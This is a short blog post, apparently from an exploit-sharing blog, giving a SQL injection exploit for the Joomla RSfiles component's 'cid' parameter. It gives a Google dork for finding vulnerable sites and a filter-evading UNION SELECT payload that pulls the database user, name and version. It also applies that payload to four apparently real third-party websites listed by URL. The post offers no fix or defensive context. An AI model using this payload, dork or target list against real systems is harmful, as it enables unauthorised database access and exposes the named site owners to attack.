# Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author : ByEge
# Contact : http://byege.blogspot.com
# Date : 18.03.2013
# S.Page : http://www.rsjoomla.com
# Dork : inurl:index.php?option=com_rsfiles
# DorkEx : http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles
[[SQL Injection Test]]]
http://www.theengineeringguild.co.uk/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())–
http://www.wcsaga.com/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())–
http://zootradio.com/joomla/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())–
http://pctas.org.au/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())–
Vulnerability
:
?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())–
*********************************
# Turkey.
Friday, March 22, 2013
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment